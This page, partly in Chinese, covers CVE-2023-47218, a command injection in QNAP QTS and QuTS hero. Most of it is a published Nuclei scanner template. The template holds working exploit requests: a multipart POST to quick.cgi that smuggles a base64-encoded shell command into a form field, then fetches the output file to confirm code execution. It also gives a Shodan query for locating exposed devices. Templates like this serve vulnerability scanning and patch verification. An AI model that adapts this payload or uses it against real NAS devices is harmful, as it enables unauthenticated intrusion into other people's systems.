CVE-2023-47218: QNAP QTS and QuTS Hero - OS Command Injection

日期: 2025-08-01 | 影响软件: QNAP QTS | POC: 已公开

漏洞描述

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.

PoC代码[已公开]

id: CVE-2023-47218

info:
  name: QNAP QTS and QuTS Hero  - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.92854
    epss-percentile: 0.99756
    cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
    product: qts
    vendor: qnap
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev
variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'

http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"

        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain

        skfqduny
        --avssqwfz–

      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c6aa6388d2624d96dfe9be9b5e73cc44ad1df29a060e5247466c2adfecc8680502205e5c6423711a412b0a987d62ae973941a09bbb498c2a982b4bd6907b97c72638:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47218.yaml

相关漏洞推荐